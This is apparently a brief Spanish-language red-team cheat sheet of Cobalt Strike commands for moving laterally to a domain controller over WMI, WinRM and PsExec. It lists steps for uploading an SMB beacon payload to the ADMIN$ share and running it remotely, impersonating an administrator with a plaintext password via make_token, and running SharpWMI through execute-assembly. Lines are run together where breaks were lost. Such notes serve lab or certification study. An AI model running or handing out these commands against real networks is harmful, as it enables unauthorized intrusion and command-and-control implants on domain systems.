Windows Management Instrumentation (WMI)
Crear un acceso con credenciales.
jump psexec DC01 smb_listenerjump winrm64 DC01 smb_listenerEjecutar un comando en una maquina remotamente.
remote-exec winrm DC01 [command]cd \\DC01\ADMIN$upload c:\Tools\Payloads\smb_beacon_x64.exeremote-exec wmi DC01 C:\Windows\smb_beacon_x64.exelink DC01CoInitializeSecurity
Si aparece el error CoInitializeSecurity already called al ejecutar los comandos.
make_token PAY\Administrator Qwerty123
remote-exec wmi DC01 calcPodemos realizar lo siguiente usando SharpWMI.
execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=DC01 command="C:\Windows\System32\calc.exe"